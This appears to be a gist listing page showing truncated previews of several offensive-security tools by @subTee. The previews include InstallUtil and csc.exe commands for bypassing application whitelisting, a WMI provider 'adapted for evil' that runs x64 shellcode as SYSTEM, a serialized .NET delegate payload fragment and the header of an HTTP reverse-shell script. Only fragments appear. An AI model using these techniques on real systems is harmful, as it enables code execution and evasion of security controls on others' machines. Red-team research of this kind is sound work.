This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Management; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
Step One: | |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe mimic.cs | |
Step Two: | |
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U mimic.exe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Based On LocalAdmin WMI Provider by Roger Zander | |
// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
// Adapted For Evil By @subTee | |
// Executes x64 ShellCode | |
// | |
// Deliver and Install dll | |
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
// Invoke calc for SYSTEM level calculations | |
// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
Create Your Strong Name Key -> key.snk |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); | |
actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest"; | |
try | |
{ | |
var DX = actCtx.CreateObject("DynamicWrapperX"); | |
DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function. | |
res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function. | |
} | |
catch(e){ WScript.Echo("Fail");} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.EnterpriseServices; | |
using System.Collections.Generic; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var serialized_obj = [ | |
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Author: Casey Smith @subTee | |
License: BSD3-Clause | |
.SYNOPSIS | |
Simple Reverse Shell over HTTP. Execute Commands on Client. | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Net; | |
using System.Text; | |
using System.IO.Compression; | |
using System.Collections.Generic; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; |